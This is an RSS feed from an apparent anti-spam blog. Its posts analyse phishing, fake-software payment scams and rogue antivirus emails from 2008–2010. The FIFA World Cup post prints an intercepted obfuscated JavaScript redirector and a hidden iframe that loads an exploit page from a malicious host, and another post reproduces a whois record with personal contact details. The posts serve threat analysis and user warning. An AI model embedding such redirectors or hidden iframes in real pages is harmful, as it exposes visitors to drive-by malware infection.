<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>mxlab - all about anti virus and anti spam &#187; Email security</title>
	<atom:link href="http://blog.mxlab.eu/category/email-security/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.mxlab.eu</link>
	<description>mx lab blog - all about anti virus and anti spam</description>
	<lastBuildDate>Wed, 28 Jul 2010 23:26:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='blog.mxlab.eu' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/8be3c09044ac5968d17dadf3224891c4?s=96&#038;d=http://s2.wp.com/i/buttonw-com.png</url>
		<title>mxlab - all about anti virus and anti spam &#187; Email security</title>
		<link>http://blog.mxlab.eu</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://blog.mxlab.eu/osd.xml" title="mxlab - all about anti virus and anti spam" />
	<atom:link rel='hub' href='http://blog.mxlab.eu/?pushpress=hub'/>
		<item>
		<title>Emails offering PDF Reader 2010 lead to unsecure payment site</title>
		<link>http://blog.mxlab.eu/2010/07/27/emails-offering-pdf-reader-2010-lead-to-unsecure-payment-site/</link>
		<comments>http://blog.mxlab.eu/2010/07/27/emails-offering-pdf-reader-2010-lead-to-unsecure-payment-site/#comments</comments>
		<pubDate>Tue, 27 Jul 2010 23:54:56 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Email security]]></category>
		<category><![CDATA[Various]]></category>
		<category><![CDATA[PDF]]></category>
		<category><![CDATA[Adobe PDF]]></category>
		<category><![CDATA[PDF Reader 2010]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=965</guid>
		<description><![CDATA[MX Lab intercepted some emails with the subject &#8220;Upgrade New PDF Acrobat Reader/Writer For Windows And Mac&#8221; from the email address &#8220;Adobe &#60;newsletter@adobe-upgrade-2010.com&#62;&#8221;. Notice the use of Adobe in the email. In the email, an offer is made to download the new PDF Reader 2010 for Windows and Mac. This is the body of the [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=965&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted some emails with the subject &#8220;Upgrade New PDF Acrobat Reader/Writer For Windows And Mac&#8221; from the email address &#8220;Adobe &lt;newsletter@adobe-upgrade-2010.com&gt;&#8221;. Notice the use of Adobe in the email. In the email, an offer is made to download the new PDF Reader 2010 for Windows and Mac.</p>
<p>This is the body of the email:</p>
<blockquote><p>PDF Reader 2010 &#8211; New Version for Windows and Mac<br />
The latest PDF Reader: Open, Edit  Create PDF Files</p>
<p>What&#8217;s new in this version :</p>
<p>-Open, edit and view all PDF files.<br />
-Enhanced performance with faster loading and zooming.<br />
-Collect your data and combine it into a high quality document.</p>
<p>hxxp://www.adobe-upgrade-2010.com/</p>
<p>Thank you for choosing us, the worldwide leader in PDF Reader<br />
Solutions.</p>
<p>Best Regards,</p>
<p>Tommy Johnson<br />
PDF Reader 2010</p></blockquote>
<p>When visiting this web site, it all makes perfect sense, it&#8217;s a company that offers a PDF Reader/Writer that can do more than the Adobe Reader on its own. But when you go further you will notice some issues with the web site and the offer.</p>
<p>When following the URL in the email, you get redirected to hxxp://2010-pdf-pro.com/.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100728_pdfwriterreader_1.gif" alt="" width="450" height="246" /></p>
<p>It seems like you can download the software for free, there is no pricing information on the web site, so you go forward with the Download button.</p>
<p>The Download button leads to the page hxxp://2010-pdf-pro.com/join.asp but you will get a redirect again to the domain hxxp://secure-signup.ru/. Do not get fooled by the domain name secure-signup.ru. The browser session is not secured at all while most genuine web shops already have a secured session through https:// when you sign up for a service or software.</p>
<p>The site asks you to fill in your email address twice for confirmation, your first and last name and country.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100728_pdfwriterreader_2.gif" alt="" width="450" height="338" /></p>
<p>When continuing to step 2 you will get the membership choices and here we have it: the PDF Reader 2010 comes not for free. You will need to choose from some 1, 2 or 3 year online access and support.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100728_pdfwriterreader_3.gif" alt="" width="450" height="340" /></p>
<p>When you have made your choice you can continue the process by validating your credit card. Notice that you haven&#8217;t filled in any details regarding invoicing. The web forms did not ask for your address, zip or postcode to create an invoice or proof of purchase.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100728_pdfwriterreader_4.gif" alt="" width="450" height="421" /></p>
<p>On the web form to validate your credit card, you still have no secure https:// connection. This means that your details are send over the internet without any encryption at all and can be read by anyone. What&#8217;s worse, your credit card details are now in the hands of a person or group with bad intentions.</p>
<p>Update 29 July 2010:</p>
<p>On the 27th we did fill in a dummy email address to test the webforms on the web sites above and today we received a mailing with the following content:</p>
<blockquote><p>Dear valued customers,</p>
<p>We are pleased to announce the newest version of PDF Reader 2010 which will enable you to view, create, edit and print PDF documents. The PDF format as a global exchange document format is created by Adobe and is the most efficient way to exchange information.</p>
<p>Simply visit the link below and enter your PDF reader code:</p>
<p>PDF Reader Code: 5013<br />
Go here to receive the latest 2010 version</p>
<p>Thank you for choosing us, the worldwide leader in PDF Reader solutions.</p>
<p>Mike Robertson<br />
PDF Reader Support</p>
<p>Copyright PDF Reader 2010 &#8211; All rights reserved</p>
<p>You are currently subscribed to sm-pdf as geert@betransport.com<br />
Safely unsubscribe from sm-pdf at any time.</p>
<p>Media Internet Consultants &#8211; Edif. Neptuno, Planta Baja, Ave. Ricardo J. Alfaro, Tumba Muerto, n/a, Panama</p></blockquote>
<p>Behind &#8220;Go here to receive the latest 2010 version&#8221; is the link hxxp://list.directmediafive.com/t/2549518/64766653/4988/0/ that will redirect you to hxxp://new-pdf-reader.com/1/promo/index.asp?aff=11677&amp;camp=pdf_x1</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100728_pdfwriterreader_5.gif" alt="" width="450" height="346" /></p>
<p>The web form is now somewhat different and allows you to fill in your PDF Reader code 5013. Based on this you get a certain discount. When we wanted to leave the page an go back one page, we got a pop up windows with an 50% reduction in the price, offered for a 24 hour period with a count down counter on the site.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100728_pdfwriterreader_7.gif" alt="" width="450" height="394" /></p>
<p>When going further through the process, we did got an https:// connection for sending the credit card details. But based on the facts above and mentioned in this article, I would not recommend anyone doing this. There are too many variables that gives us the idea that buying on this site will result in troubles.</p>
<p>The mailing also contains an unsubscribe URL using hxxp://list.directmediafive.com/. It gives you the idea that this is a genuine company. But what is quite interesting, is that when visiting the domain http://www.directmediafive.com/ directly, you will get a web page of a parked domain.</p>
<p>We have used the unsubscribe URL included in the mailing and will now see what happens during the next few days.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/965/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/965/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/965/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/965/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/965/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/965/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/965/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/965/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/965/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/965/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=965&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/07/27/emails-offering-pdf-reader-2010-lead-to-unsecure-payment-site/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100728_pdfwriterreader_1.gif" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100728_pdfwriterreader_2.gif" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100728_pdfwriterreader_3.gif" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100728_pdfwriterreader_4.gif" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100728_pdfwriterreader_5.gif" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100728_pdfwriterreader_7.gif" medium="image" />
	</item>
		<item>
		<title>&#8220;FIFA World Cup South Africa&#8230; bad news&#8221; emails leads reader to host with malware</title>
		<link>http://blog.mxlab.eu/2010/06/11/fifa-world-cup-south-africa-bad-news-emails-leads-reader-to-host-with-malware/</link>
		<comments>http://blog.mxlab.eu/2010/06/11/fifa-world-cup-south-africa-bad-news-emails-leads-reader-to-host-with-malware/#comments</comments>
		<pubDate>Fri, 11 Jun 2010 14:43:36 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Email security]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[FIFA]]></category>
		<category><![CDATA[FIFA World Cup South Africa]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=919</guid>
		<description><![CDATA[MX Lab intercepted a few samples of emails with the subject &#8220;FIFA World Cup South Africa&#8230; bad news&#8221;. The from address is spoofed and this is the body of the email: Hello!! FIFA World Cup 2010 scandal news, read attached document Attached is the file news.html or open.html that contains a malicious javascript: &#60;script type=&#8217;text/javascript&#8217;&#62; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=919&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted a few samples of emails with the subject &#8220;FIFA World Cup South Africa&#8230; bad news&#8221;.</p>
<p>The from address is spoofed and this is the body of the email:</p>
<blockquote><p>Hello!!</p>
<p>FIFA World Cup 2010 scandal news, read attached document</p></blockquote>
<p>Attached is the file news.html or open.html that contains a malicious javascript:</p>
<blockquote>
<div id="_mcePaste">&lt;script type=&#8217;text/javascript&#8217;&gt;</div>
<div id="_mcePaste">function dX(){};</div>
<div id="_mcePaste">var h=new Date();</div>
<div id="_mcePaste">dX.prototype = {</div>
<div id="_mcePaste">f : function() {</div>
<div id="_mcePaste">var u=function(){};</div>
<div id="_mcePaste">var uY=new Date();</div>
<div id="_mcePaste">var o=&#8221;";</div>
<div id="_mcePaste">var k=document;</div>
<div id="_mcePaste">var oE=function(){};</div>
<div id="_mcePaste">var l=&#8221;;</div>
<div id="_mcePaste">this.i=33457;</div>
<div id="_mcePaste">var kV=k['l.oSc&lt;a(t&lt;i_oSnS'.replace(/[S_\&lt;\(\.]/g, &#8221;)];</div>
<div id="_mcePaste">var w=function(){};</div>
<div id="_mcePaste">var p=false;</div>
<div id="_mcePaste">this.pP=false;</div>
<div id="_mcePaste">this.s=&#8221;;</div>
<div id="_mcePaste">kV['hGrGe&gt;f&gt;'.replace(/[\&gt;mYGw]/g, &#8221;)]=&#8217;hJt&gt;t&gt;p&gt;:S/2/2aSd&gt;v2aSnlcleldSwloloJd&gt;tSe2c2hJ.2cSo&gt;ml/<br />
2xJnSuJ4JeSjS/2z2.ShltlmJ&#8217;.replace(/[JS2\&gt;l]/g, &#8221;);</div>
<div id="_mcePaste">var iK=&#8221;iK&#8221;;</div>
<div id="_mcePaste">pK=&#8221;;</div>
<div id="_mcePaste">this.d=&#8221;d&#8221;;</div>
<div id="_mcePaste">uM=&#8221;";</div>
<div id="_mcePaste">}</div>
<div id="_mcePaste">};</div>
<div id="_mcePaste">this.dK=&#8221;";</div>
<div id="_mcePaste">var fG=new dX();</div>
<div id="_mcePaste">var dR=&#8221;dR&#8221;;</div>
<div id="_mcePaste">fG.f();</div>
<div id="_mcePaste">hJ=false;</div>
<div id="_mcePaste">&lt;/script&gt;</div>
</blockquote>
<p>This Javascript will redirect your browser to hxxp://advancedwoodtech.com/xnu4ej/z.htm.</p>
<p>At the moment, the web site page mentioned here is not active, we got a 404 error when visiting, so we can&#8217;t investigate this further. But we are pretty sure that you will download some malware with an attempt to infect your computer and get redirected to a spam web site of the Canadian Pharmacy.</p>
<p>This email has all the characteristics of previous campaigns where social media is being used to lure visitors to a web site and get their computer infected.</p>
<p>Our recommendation is: when you receive this type of email, do not open the attached HTML file and delete the email.</p>
<p>[UPDATE]</p>
<p>MX Lab intercepted a new version of this social engineering attack and the email now contains the file open.html.</p>
<p>This leads to the web site hxxp://shoppingbazzar.co.uk/z.htm. The online document z.html contains the following code:</p>
<blockquote>
<pre>&lt;<span class="start-tag">meta</span><span class="attribute-name"> http-equiv</span>=<span class="attribute-value">"refresh" </span><span class="attribute-name">content</span>=<span class="attribute-value">"3;url=hxxp://toldspeak.com/" </span><span class="error"><span class="attribute-name">/</span></span>&gt;

&lt;<span class="start-tag">iframe</span><span class="attribute-name"> src</span>='hxxp://hugefrogs.ru:8080/index.php?pid=10' <span class="attribute-name">width</span>=<span class="attribute-value">'1'
</span><span class="attribute-name">height</span>=<span class="attribute-value">'1' </span><span class="attribute-name">style</span>=<span class="attribute-value">'visibility: hidden;'</span>&gt;&lt;/<span class="end-tag">iframe</span>&gt;</pre>
</blockquote>
<p>This will redirect your browser to hxxp://toldspeak.com after 3 seconds that contains the Canadian Pharmacy web site as mentioned earlier.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" alt="" width="450" height="418" /></p>
<p>The site hxxp://hugefrogs.ru:8080/index.php?pid=10 contains more obfuscated JavaScript that creates an iframe to a PDF file and to a Java .jar file. With one of these files an attack is being executed to the computer.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/919/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/919/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/919/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/919/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/919/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/919/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/919/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/919/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/919/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/919/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=919&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/06/11/fifa-world-cup-south-africa-bad-news-emails-leads-reader-to-host-with-malware/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" medium="image" />
	</item>
		<item>
		<title>Rogue anti virus program:  Antivirus for Windows – New 2009 Version</title>
		<link>http://blog.mxlab.eu/2009/03/11/rogue-anti-virus-program-antivirus-for-windows-%e2%80%93-new-2009-version/</link>
		<comments>http://blog.mxlab.eu/2009/03/11/rogue-anti-virus-program-antivirus-for-windows-%e2%80%93-new-2009-version/#comments</comments>
		<pubDate>Wed, 11 Mar 2009 14:37:28 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Email security]]></category>
		<category><![CDATA[Viruses]]></category>
		<category><![CDATA[anti virus]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[rogua anti virus program]]></category>
		<category><![CDATA[trojan]]></category>

		<guid isPermaLink="false">http://blog.mxlab.be/?p=378</guid>
		<description><![CDATA[MX Lab intercepted a message that caught our attention. Some time ago, a rogue anti virus/anti spyware program known as Antivirus 2009, XP Antivirus Protection, MSAntivirus 2008 and Vista Antivirus 2008 was promoted on the internet and in various spam emails. It seems that this now is distributed under a new name &#8220;Antivirus for Windows [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=378&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted a message that caught our attention. Some time ago, a rogue anti virus/anti spyware program known as <a title="Remove Antivirus 2009" href="http://www.spywareremove.com/removeAntivirus2009.html">Antivirus 2009</a>, <a title="Remove XP Antivirus Protection" href="http://www.spywareremove.com/removeXPAntivirusProtection.html">XP Antivirus Protection</a>, <a title="Remove MSAntivirus 2008" href="http://www.spywareremove.com/removeMSAntivirus2008.html">MSAntivirus 2008</a> and <a title="Remove Vista Antivirus 2008" href="http://www.spywareremove.com/removeVistaAntivirus2008.html">Vista Antivirus 2008</a> was promoted on the internet and in various spam emails.</p>
<p>It seems that this now is distributed under a new name &#8220;Antivirus for Windows – New 2009 Version&#8221;.</p>
<p>The email was sent from PC Protection &lt;internet.clientservice@gmail.com&gt; and contains the subject &#8220;Update your Antivirus for Windows.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20090311_avforwindow_2009_1.jpg" alt="" width="340" height="373" /></p>
<p>The email looks like a mailing and contains an Unsubscribe, Forward and Update Profile links. However, when looking at all the links in the message, some links are invalid like the Report Abuse link that contains an URL to http://ss25..sourcecompmail.com/ &#8211; note the double point after ss25. The domains http://ss25.sourcecompmail.com/ or http://sourcecompmail.com/ are giving us an HTTP 404 error and contains no web site. It is very common to work from under a subdomain and pages under that domain without any root HTML pages.</p>
<p>The domain itself appears to be registered at Tucows with the following details:</p>
<blockquote>
<pre>[whois.tucows.com]
Registrant:
 Quattro Web Solutions
 13 Hares avenue
 Woodstock
 Cape Town,  7925
 ZA

 Domain name: SOURCECOMPMAIL.COM

 Administrative Contact:
    Honig, Paul  paul@quattro.co.za
    15 Wandel street
    Gardens
    Cape Town
    Cape Town,  7925
    ZA
    +27.4480099    Fax: +27.214619277

 Technical Contact:
    Desk, Help  domreg@ns.com
    322 South Marietta Street
    ww
    w
    Gastonia, WI 28052
    US
    +1.7048527000    Fax: +1.7048849011

 Registrar of Record: TUCOWS, INC.
 Record last updated on 28-Oct-2008.
 Record expires on 28-Oct-2009.
 Record created on 28-Oct-2008.

 Registrar Domain Name Help Center:

http://domainhelp.tucows.com

 Domain servers in listed order:
    NS3.NITRIC.CO.ZA
    NS2.NITRIC.CO.ZA   

 Domain status: clientTransferProhibited
                clientUpdateProhibited</pre>
</blockquote>
<p>When following the download links, a landing page is shown:</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20090311_avforwindow_2009_2.jpg" alt="" width="340" height="419" /></p>
<p>When filling in your email address and the activation code you are presented with a payment screen.</p>
<p>Recommendation: do not proceed with the payment process and do not download the program.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/378/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/378/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/378/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/378/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/378/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/378/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/378/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/378/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/378/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/378/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=378&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2009/03/11/rogue-anti-virus-program-antivirus-for-windows-%e2%80%93-new-2009-version/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20090311_avforwindow_2009_1.jpg" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20090311_avforwindow_2009_2.jpg" medium="image" />
	</item>
		<item>
		<title>Flash being used in spam emails</title>
		<link>http://blog.mxlab.eu/2008/07/30/flash-being-used-in-spam-emails/</link>
		<comments>http://blog.mxlab.eu/2008/07/30/flash-being-used-in-spam-emails/#comments</comments>
		<pubDate>Wed, 30 Jul 2008 21:50:53 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Email security]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Commtouch]]></category>
		<category><![CDATA[flash spam]]></category>
		<category><![CDATA[swf spam]]></category>

		<guid isPermaLink="false">http://mxlab.wordpress.com/?p=135</guid>
		<description><![CDATA[Spammers often include links in their messages directing to web sites. These links are most of the time in the form of a URL including .html, .htm, .asp, .php or something similar. A new spam trick includes now to include an URL directing to an Flash animation with the .swf extension. Most browsers will play [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=135&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>Spammers often include links in their messages directing to web sites. These links are most of the time in the form of a URL including .html, .htm, .asp, .php or something similar.</p>
<p>A new spam trick includes now to include an URL directing to an Flash animation with the .swf extension. Most browsers will play the Flash movie even if this one isn&#8217;t embedded in an .html page.</p>
<p>The Flash contains no animation but a redirect to a web site with the spammers offer.</p>
<p>Commtouch reports that the messages arrived in small quantities on Saturday, and by Monday, July 28, had become a massive outbreak. 7000 URLs have been created and used in millions of spam messages.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/mxlab.wordpress.com/135/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/mxlab.wordpress.com/135/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/135/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/135/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/135/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/135/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/135/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/135/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/135/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/135/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/135/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/135/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=135&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2008/07/30/flash-being-used-in-spam-emails/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>Q2 2008 Email Threats Trend Report</title>
		<link>http://blog.mxlab.eu/2008/07/08/q2-2008-email-threats-trend-report/</link>
		<comments>http://blog.mxlab.eu/2008/07/08/q2-2008-email-threats-trend-report/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 23:00:55 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Email security]]></category>
		<category><![CDATA[MX Lab News]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Viruses]]></category>
		<category><![CDATA[email threats]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[spam trends]]></category>
		<category><![CDATA[trend report]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[zombie]]></category>
		<category><![CDATA[zombie network]]></category>

		<guid isPermaLink="false">http://mxlab.wordpress.com/?p=92</guid>
		<description><![CDATA[&#8220;On average, nearly 10 million zombie computers actively sent spam and email-based malware everyday during Q2. The vast majority of those IP addresses are dynamic, meaning they are taken in and out of use at will by the botmaster controlling the network. Dynamic control of large numbers of zombie IPs is what allows the continuous delivery of malicious materials across the Internet. By [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=92&subd=mxlab&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<p>&#8220;On average, nearly 10 million zombie computers actively sent spam and email-based malware everyday during Q2. The vast majority of those IP addresses are dynamic, meaning they are taken in and out of use at will by the botmaster controlling the network. Dynamic control of large numbers of zombie IPs is what allows the continuous delivery of malicious materials across the Internet. By the time traditional security solutions identify and block the source of a new threat, the botmaster easily deactivates them and switches to another set of sender IPs under his control.&#8221;</p>
<p>Read the full co-brandend MX Lab &#8211; Commtouch® &#8211; 2008 Q2 Email Threats Trend Report at <a href="http://www.mxlab.eu/en/news/reports.html" target="_blank">http://www.mxlab.eu/en/news/reports.html</a>.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/mxlab.wordpress.com/92/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/mxlab.wordpress.com/92/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/92/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/92/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/92/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=92&subd=mxlab&ref=&feed=1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2008/07/08/q2-2008-email-threats-trend-report/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>Malware distribution techniques</title>
		<link>http://blog.mxlab.eu/2008/04/21/malware-distribution-techniques/</link>
		<comments>http://blog.mxlab.eu/2008/04/21/malware-distribution-techniques/#comments</comments>
		<pubDate>Mon, 21 Apr 2008 18:14:02 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Email security]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[root kit]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[Trojan-PSW.Win32.Papras]]></category>

		<guid isPermaLink="false">http://mxlab.wordpress.com/?p=66</guid>
